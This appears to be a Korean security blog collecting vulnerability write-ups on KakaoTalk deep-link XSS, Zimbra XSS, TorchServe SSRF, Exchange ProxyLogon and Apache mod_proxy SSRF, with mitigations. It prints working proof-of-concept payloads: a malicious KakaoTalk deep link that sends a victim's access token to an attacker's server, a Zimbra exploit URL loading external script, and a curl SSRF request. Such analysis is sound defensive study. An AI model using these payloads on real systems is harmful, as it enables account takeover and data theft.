꼰머의 보안공부

1. 개요

- 국내에서 가장 많이 사용되는 메신저 카카오톡에서 취약점이 발견 [1]
- Deep Link 유효성 검사로 인해 원격 공격자가 제어하는 자바스크립트를 임의로 실행할 수 있음
- 다른 사용자의 계정 탈취, 채팅 메시지 무단 열람이 가능해짐

2. 주요내용

- 카카오톡 10.4.3 버전의 Deep Link 유효성 검사 문제로 공격자는 WebView 내에서 공격자가 제어하는 자바스크립트가 실행되는 취약점

> 자바스크립트를 실행해 HTTP 요청 헤더에서 액세스 토큰을 유출할 수 있음

> 해당 토큰을 사용해 다른 사용자의 계정을 탈취하고 채팅 메시지를 무단으로 열람할 수 있게 됨

※ 23.12 카카오에 제보 및 24.06.24 업데이트된 것으로 확인

2.1 배경

- 카카오톡은 기본적으로 종단 간 암호화 E2EE(End-to-End Encrypted)를 사용하지 않음(활성화되어 있지 않음)

> "Secure Chat"이라는 옵트인 E2EE 기능이 있지만 그룹 메시징이나 음성 통화를 지원하지 않음.

2.2 CommerceBuyActivity

- WebView CommerceBuyActivity는 공격자 관점에서 주요 진입점

> Deep Link로 시작할 수 있음(Ex. adb shell am start kakaotalk://buy)

> JavaScript가 활성화되어 있음 (settings.setJavaScriptEnabled(true);)

> intent:// 방식을 지원해 다른 앱 구성요소에 데이터 전송 가능
> intent:// URI의 검증이 부족해 잠재적으로 모든 앱 컴포넌트에 접근 가능
> Authorization HTTP 헤더에서 액세스 토큰을 유출

※ Deep Link: 모바일 웹상에 있는 링크나 그림을 클릭할 경우 기기 내 관련 앱이나 사전에 정의된 특정 웹페이지가 실행되는 모바일 기술

2.3 URL 리디렉션을 통한 DOM XSS

> hxxps://buy.kakao.com에서 hxxps://buy.kakao.com/auth/0/cleanFrontRedirect?returnUrl= 엔드포인트를 통해 XSS 취약점 발견
> hxxps://m.shoppinghow.kakao.com/m/search/q/alert(1)에서 이미 저장된 XSS를 확인
> 따라서 CommerceBuyActivity에서 임의의 JavaScript를 실행해 사용자의 액세스 토큰을 유출할 수 있음

- 악성 Deep Link를 생성해 사용자의 액세스 토큰을 공격자가 제어하는 서버로 전송 가능

> 이를 통해 카카오 메일 계정을 탈취하거나 새로운 카카오 메일 계정을 생성해 기존 이메일 주소를 덮어쓸 수 있음
> 또는, 피해자의 카카오 메일 계정에 접근해 비밀번호 재설정을 시도할 수 있음(2FA 우회를 위해 Burp를 사용해 요청을 가로채고 수정)

2.4 PoC

① 공격자는 악성 Deep Link를 생성

[악성 Deep Link 예시]
location.href = decodeURIComponent("kakaotalk%3A%2F%2Fbuy%2Fauth%2F0%2FcleanFrontRedirect%3FreturnUrl%3Dhttps%3A%2F%2Fm.shoppinghow.kakao.com%2Fm%2Fproduct%2FQ24620753380%2Fq%3A%22%3E%3Cimg%20src%3Dx%20onerror%3D%22document.location%3Datob%28%27aHR0cDovLzE5Mi4xNjguMTc4LjIwOjU1NTUv%27%29%3B%22%3E");

[Decoding]
location.href = decodeURIComponent("kakaotalk://buy/auth/0/cleanFrontRedirect?returnUrl=https://m.shoppinghow.kakao.com/m/product/Q24620753380/q:"><img src=x onerror="document.location=atob('hxxp://192.168.178.20:5555/');">");

② HTTP 서버 및 Netcat 수신기 시작
③ 피해자에게 링크 클릭 유도
④ 피해자가 링크를 클릭할 경우 액세스 토큰 유출

GET /foo.html HTTP/1.1
Host: 192.168.178.20:5555
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Linux; Android 10; M2004J19C Build/QP1A.190711.020; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/119.0.6045.66 Mobile Safari/537.36;KAKAOTALK 2610420;KAKAOTALK 10.4.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
authorization: 64f03846070b4a9ea8d8798ce14220ce00000017017793161400011gzCIqV_7kN-deea3b5dc9cddb9d8345d95438207fc0981c2de80188082d9f6a8849db8ea92e
os_name: Android
kakao-buy-version: 1.0
os_version: 10.4.2
X-Requested-With: com.kakao.talk
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9

2.5 Takeaways

- 여전히 복잡하지 않은 공격 체인으로 사용자의 메시지를 탈취할 수 있는 인기 채팅 앱이 존재
- 앱 개발자가 몇 가지 간단한 실수를 하면 Android의 강력한 보안 모델과 메시지 암호화가 도움이 되지 않음
- 아시아 채팅 앱은 보안 연구 커뮤니티에서 여전히 저평가되고 있음

2.6 기타

- 개발자 보안 교육 필요성: 안전한 어플리케이션 개발을 위한 보안 교육 진행(시큐어 코딩, 민감 데이터 관련 기능 개발 주의 등)
- 사용자 보안 교육 필요성: 출처가 불분명한 의심스러운 링크를 클릭하지 않고, 2FA를 사용하는 등의 보안 교육 진행
- 다른 메신저 사용 고려

3. 참고

[1] https://stulle123.github.io/posts/kakaotalk-account-takeover/
[2] https://nvd.nist.gov/vuln/detail/CVE-2023-51219
[3] https://www.boannews.com/media/view.asp?idx=130938&page=1&kind=1

1. Zimbra Collaboration Suite (ZCS)

- Zimbra, Inc에서 개발한 이메일 서버와 웹 클라이언트를 포함하는 협업 소프트웨어

2. 취약점

- 취약한 버전의 ZCS에서 매개변수에 대한 검증이 부족하여(또는 없어) 발생하는 XSS 취약점

- 미상의 해킹 그룹이 해당 취약점을 이용해 전세계 여러 정부 기관을 익스플로잇

영향받는 버전
ZCS 8.8.15 Patch 41 이전 8.8.X 버전

2.1 취약점 상세 [2]

- momoveto 파일의 st 매개변수에대한 입력값 검증이 부족(또는 없어) 발생하는 것으로 판단됨

> 취약 파일 경로: /opt/zimbra/jetty/webapps/zimbra/m/momoveto

> 업데이트 이전 환경을 확인해보면 st 매개변수에대한 검증이 없이 사용되는 것으로 판단됨

<input name="st" type="hidden" value="${param.st}"/>

- 공격 스크립트 및 디코딩 결과는 다음과 같음

[공격 스크립트]
hxxps://mail.REDACTED[.]com/m/momovetost=acg%22%2F%3E%3Cscript%20src%3D%22hxxps%3A%2F%2Fobsorth%2Eopwtjnpoc%2Eml%2FpQyMSCXWyBWJpIos%2Ejs%22%3E%3C%2Fscript%3E%2F%2F

[디코딩]
hxxps://mail.REDACTED[.]com/m/momoveto?st=acg"/><script src="hxxps://REDACTED/script.js"></script>//

- 공격자는 익스플로잇 URL이 포함된 메일 전송

> 사용자가 해당 메일의 링크를 클릭할 경우 공격이 진행 [3]
> 사용자 이메일과 첨부파일을 탈취하고, 자동 전달 규칙을 설정해 공격자가 제어하는 이메일 주소로 리다이렉션

- 서로 다른 미상의 해킹 그룹은 총 4번의 공격 캠페인을 진행

> 캠페인 1(23.07.29): 익스플로잇 URL이 포함된 메일을 전송 및 실행을 유듀해 이메일 탈취 [3]
> 캠페인 2(23.07.11): 특정 조직에 맞춤화되고, 고유한 공식 이메일 주소가 포함된 여러 익스플로잇 URL 전송 [4][5]
> 캠페인 3(23.07.20): 웹 메일 자격증명을 캡쳐하는 피싱페이지로 연결되는 익스플로잇 URL을 포함하는 피싱메일 전송
> 캠페인 4(23.08.25): 짐브라 인증 토큰을 탈취하기 위한 피싱메일 전송

3. 대응

- 짐브라는 23.07.05 깃허브에 핫픽스 배포 [6]
> 23.07.13 모든 사서함 노드에 수정 사항을 수동으로 적용하는 방법 공개 [7]
> 23.07.25 공식 패치 발표 [8]

※ escapeXml()를 이용해 st 매개변수에대한 입력값 검증 과정을 추가한 것으로 판단됨

[수동 적용 방법]
① /opt/zimbra/jetty/webapps/zimbra/m/momoveto 파일을 백업 후 편집
② 해당 파일 40번째 줄 매개변수 값 업데이트
> <input name="st" type="hidden" value="${fn:escapeXml(param.st)}"/>

※ 업데이트 이전 값: <input name="st" type="hidden" value="${param.st}"/>

4. 참고

[1] https://nvd.nist.gov/vuln/detail/CVE-2023-37580
[2] https://blog.google/threat-analysis-group/zimbra-0-day-used-to-target-international-government-organizations/amp/
[3] https://www.volexity.com/blog/2022/02/03/operation-emailthief-active-exploitation-of-zero-day-xss-vulnerability-in-zimbra/
[4] https://www.proofpoint.com/us/blog/threat-insight/exploitation-dish-best-served-cold-winter-vivern-uses-known-zimbra-vulnerability
[5] https://www.welivesecurity.com/en/eset-research/winter-vivern-exploits-zero-day-vulnerability-roundcube-webmail-servers/
[6] https://github.com/Zimbra/zm-web-client/commit/874ac8c158532a057b9857c21e1e03853b77ee6b
[7] https://blog.zimbra.com/2023/07/security-update-for-zimbra-collaboration-suite-version-8-8-15/
[8] https://wiki.zimbra.com/wiki/Zimbra_Security_Advisories
[9] https://www.boannews.com/media/view.asp?idx=123874&page=1&kind=1
[10] https://www.dailysecu.com/news/articleView.html?idxno=151326

1. TorchServe

- Meta와 AWS에서 개발한 파이토치(PyTorch) 머신러닝 라이브러리를 기반으로 하는 새로운 모델 서비스 프레임워크 [1]

- 파이토치(PyTorch) 란 딥러닝 구현을 위한 파이썬 기반의 오픈소스 머신러닝 라이브러리 [2]

- PyTorch 생태계의 인기 있는 오픈 소스 패키지

2. 취약점

- TorchServer의 기본 설정 사용 시 부적절한 입력 값 검증으로인해 발생하는 SSRF 취약점 (CVSS: 9.8)

- 공격자는 해당 취약점을 이용해 TorchServe에 악성 모델을 업로드하여 임의 코드를 실행할 수 있음

영향받는 버전
- TorchServe 0.3.0 ~ 0.8.1 버전

2.1 취약점 상세 [4]

- TorchServe의 안내에 따르면, 인증되지 않은 접근을 방지 하기위해 기본적으로 localhost에서만 접근이 가능

- 실제 인터페이스는 기본적으로 0.0.0.0에 바인딩 되어 있으며, 사용자 인증 과정이 부재

> IP 0.0.0.0는 모든 주소를 의미하기 때문에, 모든 IP에서 접근이 가능함을 의미 [6][7]

> 또한, 인증 과정이 없어 공격자가 서버에 접근하여 악성 모델 업로드 및 임의 코드가 실행할 수 있음

inference_address=hxxp://0.0.0.0:8080
management_address=hxxp://0.0.0.0:8081
metrics_address=hxxp://0.0.0.0:8082

2.2 CVE-2022-1471 [8][9]

- CVE-2023-43654 외에 해당 취약점에도 영향 받는 것으로 확인됨

> SnakeYaml 2.0 이전 버전의 Constructor() 클래스는 역직렬화 중 인스턴스화될 수 있는 유형을 제한하지 않아 악성 Yaml 콘텐츠를 역직렬화 하여 원격 코드를 실행하는 취약점

3. 대응방안

① 벤더사에서 제공하는 최신 업데이트 적용 [10]

② 기본 설정 변경

- 해당 취약점은 기본 설정을 그대로 사용해 발생하는 취약점

> 따라서, 기본 설정을 내부 환경에 맞게 적절한 변경이 필요

- 최신 패치 버전(0.8.2)에서는 기본 설정을 사용할 경우 사용자에게 경고 알림을 발생시키는 것으로 확인됨.

③ config.properties 파일 수정

- 신뢰할 수 있는 도메인에서만 모델을 가져올 수 있도록 config.properties 파일 수정

<예시>
allowed_urls=https://s3.amazonaws.com/.*,https://torchserve.pytorch.org/.*

④ 점검 툴 사용 [11]

- 취약점을 발견한 보안 업체에서 해당 취약점에 영향을 받는지 확인할 수 있는 점검 툴 제공

response=$(curl --max-time 10 -s -X POST http://$TORCHSERVE_IP:$TORCHSERVE_PORT/workflows\?url\=$REMOTE_SERVER/$SSRF_DOWNLOAD_FILE_NAME)
response=$(echo "$response" | tr -d '[:space:]')
echo -e "${COLOR_WHITE_FORMAT}Checking CVE-2023-43654 Remote Server-Side Request Forgery (SSRF)"

# If no response at all
if [ -z "$response" ]; then
  echo -e "${COLOR_YELLOW_FORMAT}Cannot check CVE-2023-43654 Failed to send request to http://$TORCHSERVE_IP:$TORCHSERVE_PORT"

# Check response
else
  if [[ "$response" == "$SSRF_RESPONSE_EXISTS" ]]; then
    echo -e "${COLOR_YELLOW_FORMAT}The test file already exists in the server.To test again remove the file <torchserve_path>model-server/model-store/$SSRF_DOWNLOAD_FILE_NAME and run the script."
    HAS_SSRF=true
  elif [[ "$response" == "$SSRF_RESPONSE" ]]; then
    HAS_SSRF=true
    echo -e "${COLOR_RED_FORMAT}Vulnerable to CVE-2023-43654 SSRF file download"
  elif [[ "$response" == "$SSRF_NOT_VULNERABLE_RESPONSE" ]]; then
    HAS_SSRF=false
    echo -e "${COLOR_GREEN_FORMAT}Not Vulnerable to CVE-2023-43654 SSRF file download"
  else
    HAS_SSRF=true
    echo -e "${COLOR_YELLOW_FORMAT}Could not determine if TorchServe is vulnerable to CVE-2023-43654"
  fi
fi

4. 참고

[1] https://www.aitimes.kr/news/articleView.html?idxno=16158
[2] https://blog.naver.com/os2dr/221565409684
[3] https://nvd.nist.gov/vuln/detail/CVE-2023-43654
[4] https://www.oligo.security/blog/shelltorch-torchserve-ssrf-vulnerability-cve-2023-43654
[5] https://pytorch.org/serve/configuration.html?highlight=configure+torchserve+listening
[6] https://inpa.tistory.com/entry/WEB-%F0%9F%8C%90-00000-%EB%9E%80-%EB%AC%B4%EC%97%87%EC%9D%B8%EA%B0%80
[7] https://mamu2830.blogspot.com/2022/10/what-is-0.0.0.0%20.html
[8] https://nvd.nist.gov/vuln/detail/CVE-2022-1471
[9] https://github.com/google/security-research/security/advisories/GHSA-mjmj-j48q-9wg2
[10] https://aws.amazon.com/ko/security/security-bulletins/AWS-2023-009/
[11] https://github.com/OligoCyberSecurity/ShellTorchChecker
[12] https://www.securityweek.com/critical-torchserve-flaws-could-expose-ai-infrastructure-of-major-companies/
[13] https://www.boannews.com/media/view.asp?idx=122377&kind=1&search=title&find=%C0%CE%B0%F8%C1%F6%B4%C9+%C0%CE%C7%C1%B6%F3%BF%A1+%B3%CE%B8%AE+%BB%E7%BF%EB%B5%C7%B4%C2+%BF%C0%C7%C2 

1. MS Window Exchange Serve

- 전자 메일, 연락처, 일정 등의 기능을 제공하는 협업 소프트웨어

1.1 Exchange Serve 구조

- Exchange Serve는 사용자 UI를 담당하는 Front-End와 로직을 담당하는 Back-End로 구성

- Front-End로 들어온 사용자 요청은 내부 처리 과정을 거쳐 1:1로 연결된 Back-End의 모듈로 전송

> 각 요청마다 처리하는 모듈이 다르며 각 모듈은 동일한 하나의 모듈을 상속받아 특성에 맞게 추가 구현됨

2. 취약점 [2]

- Exchange 서버에서 입력값 검증이 미흡하여 발생하는 SSRF 취약점으로 Exchange 서버로 인증이 가능

> 영향받는 버전: Microsoft Exchange Server 2013, 2016, 2019

> 공격자는 해당 공격을 통해 Exchange 서버에 접근할 수 있는 일부 권한 획득 및 추가적인 공격을 진행

2.1 CVE-2021-26855

- Front-End로 들어온 사용자의 요청을 Back-End로 전달 하기위해 ProxyRequestHandler 모듈을 사용 [4]

- ProxyRequestHandler.GetTargetBackEndServerUrl() 메서드
> urlAnchorMailbox의 값이 Null일 경우 Back-End의 Host 값을 this.AnchoredRoutingTarget.BackEndServer.Fqdn에서 가져옴

protected virtual Uri GetTargetBackEndServerUrl() {
    this.LogElapsedTime("E_TargetBEUrl");
    Uri result;
    try {
        UrlAnchorMailbox urlAnchorMailbox = this.AnchoredRoutingTarget.AnchorMailbox as UrlAnchorMailbox;
        if (urlAnchorMailbox != null) {
            result = urlAnchorMailbox.Url;
        } else {
            UriBuilder clientUrlForProxy = this.GetClientUrlForProxy();
            clientUrlForProxy.Scheme = Uri.UriSchemeHttps;
            clientUrlForProxy.Host = this.AnchoredRoutingTarget.BackEndServer.Fqdn;
            clientUrlForProxy.Port = 444;
            if (this.AnchoredRoutingTarget.BackEndServer.Version < Server.E15MinVersion) {
                this.ProxyToDownLevel = true;
                RequestDetailsLoggerBase<RequestDetailsLogger>.SafeAppendGenericInfo(this.Logger, "ProxyToDownLevel", true);
                clientUrlForProxy.Port = 443;
            }
            result = clientUrlForProxy.Uri;
        }
    }
    finally {
        this.LogElapsedTime("L_TargetBEUrl");
    }
    return result;
}

- /owa에서 사용자 요청이 올 경우 this.AnchoredRoutingTarget.BackEndServer 값은 BEResourceRequestHandler 모듈의 ResolveAnchorMailbox() 메소드를 통해 결정

> 이때, 사용자 요청에서 "X-AnonResource-Backend" 쿠키의 값을 필터링 없이 그대로 사용

> 따라서, 공격자는 해당 헤더를 접근 불가능한 내부 사이트 또는 다른 서버로 조작하여 접근이 가능하게 됨

protected override AnchorMailbox ResolveAnchorMailbox() {
    HttpCookie httpCookie = base.ClientRequest.Cookies["X-AnonResource-Backend"];
    if (httpCookie != null) {
        this.savedBackendServer = httpCookie.Value;
    }
    if (!string.IsNullOrEmpty(this.savedBackendServer)) {
        base.Logger.Set(3, "X-AnonResource-Backend-Cookie");
        if (ExTraceGlobals.VerboseTracer.IsTraceEnabled(1)) {
            ExTraceGlobals.VerboseTracer.TraceDebug<HttpCookie, int>((long)this.GetHashCode(), "[OwaResourceProxyRequestHandler::ResolveAnchorMailbox]: AnonResourceBackend cookie used: {0}; context {1}.", httpCookie, base.TraceContext);
        }
        return new ServerInfoAnchorMailbox(BackEndServer.FromString(this.savedBackendServer), this);
    }
    return new AnonymousAnchorMailbox(this);
}

- /ecp에서 사용자 요청이 올 경우 this.AnchoredRoutingTarget.BackEndServer 값은 BEResourceRequestHandler 모듈의 ResolveAnchorMailbox() 메소드를 통해 결정
> 이때, 사용자 요청에서 "X-BEResource" 쿠키의 값을 필터링 없이 그대로 사용
> 공격자는 해당 쿠키를 조작하여 내부 서버에서 계정 정보를 획득 및 악용하여 인증을 우회할 수 있음

2.2 CVE-2021-26857 [5]

- Exchange 서버에서 안전하지 않은 역직렬화로 인해 발생하는 임의코드실행 취약점

> 메일 서버 침투 후 해당 취약점을 이용해 관리자 권한을 획득하여 시스템을 장악

2.3 CVE-2021-27065 [6]

- Exchange 서버에서 발생하는 임의파일쓰기 취약점

> 메일 서버 침투 후 OAB(Offline Address Book) 설정 파일에 한줄 웹쉘을 삽입(=재설정) 후 실행 명령을 포함한 요청을 전송해 웹쉘 실행

> OAB를 재설정하는 과정에서 경로 및 확장자를 검토하는 코드가 없어 공격자가 원하는 위치에 원하는 확장자로 파일 생성 가능 [4]

※ OAB : MS Exchange Server에서 제공하는 주소록 기능으로 Outlook이 Exchange Server와 통신할 때 다운 받게 되는 주소록으로, Exchange server와 통신하지 않는(오프라인) 상황에서 해당 파일을 참조

2.4 CVE-2021-26858 [7]

- Exchange 서버에서 발생하는 임의파일쓰기 취약점

3. 대응방안

① 벤더사에서 제공하는 업데이트 적용 [8][9]

- 특정 쿠키 값 조작 후 접근 불가 사이트 접근 및 인증우회를 방지하기 위한 유효성 검증 코드 추가

- 웹쉘 실행을 방지하기 위해 생성되는 파일의 확장자에 .txt 확장자를 추가하는 코드 추가

- KISA 보호나라 보안 공지 참고 업데이트 적용 [10]

> 즉각적인 업데이트가 불가할 경우 KISA 보호나라 임시 조치 방안 참고 [11]

② 운영체제 및 사용중인 주요 SW의 보안 업데이트 적용
③ 불필요한 네트워크 서비스의 경우 중단 또는 기능 삭제
④ 방화벽 설정 등을 통해 외부에서 들어오는 스캐닝 등 차단
⑤ 웹쉘 업로드 여부 모니터링 및 관련 보안 SW 적용
⑥ 지속적 접근을 위한 스케줄러 등록 작업 검토
⑦ 공개된 공격도구들에 대한 시그니처를 보안장비에 등록하여 차단 또는 탐지하도록 설정
⑧ 로그 모니터링
⑨ 공개된 침해지표 등을 보안장비에 등록 등

4. 참고

[1] https://nvd.nist.gov/vuln/detail/CVE-2021-26855
[2] https://www.boho.or.kr/kr/bbs/view.do?bbsId=B0000127&nttId=36053&menuNo=205021
[3] https://bi-zone.medium.com/hunting-down-ms-exchange-attacks-part-1-proxylogon-cve-2021-26855-26858-27065-26857-6e885c5f197c
[4] https://chmodi.tistory.com/154
[5] https://nvd.nist.gov/vuln/detail/cve-2021-26857
[6] https://nvd.nist.gov/vuln/detail/CVE-2021-27065
[7] https://nvd.nist.gov/vuln/detail/CVE-2021-26858
[8] https://msrc.microsoft.com/blog/2021/03/multiple-security-updates-released-for-exchange-server/
[9] https://chmodi.tistory.com/157
[10] https://www.boho.or.kr/kr/bbs/view.do?bbsId=B0000133&nttId=35929&menuNo=205020
[11] https://www.boho.or.kr/kr/bbs/view.do?bbsId=B0000133&nttId=35931&menuNo=205020
[12] https://www.boannews.com/media/view.asp?idx=97934
[13] https://www.boannews.com/media/view.asp?idx=106528

1. Apache HTTP Server

- 아파치 소프트웨어 재단에서 관리하는 오픈 소스, 크로스 플랫폼 HTTP 웹 서버 소프트웨어

1.1 mod_proxy

- Apache HTTP Server의 선택적 모듈

- 다중 프로토콜 프록시/게이트웨이 서버

2. 취약점

- 인증되지 않은 사용자가 Mod_Proxy 모듈을 통해 SSRF 공격 가능

① 전제조건
- mod_proxy 구성 사용.
- VirtualHost의 ProxyPass가 지정한 URL 항목을 알아야 함.
- GET 방식을 사용하여 매우 긴 문자열을 요청하여 대상 Apache 설정을 초과

② 영향받는 조건
- Apache HTTP Server 2.4.48 이전 버전

2.1 실습

- docker 빌드 및 실행

git clone https://github.com/sixpacksecurity/CVE-2021-40438
cd CVE-2021-40438
docker build -t cve-2021-40438:1.0 .
docker run --rm -d -p 4444:80 cve-2021-40438:1.0

- curl PoC 수행 및 결과 301 응답값과 함께 google.com으로 리다이렉트

curl "http://[Dst IP]:4444/?unix:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA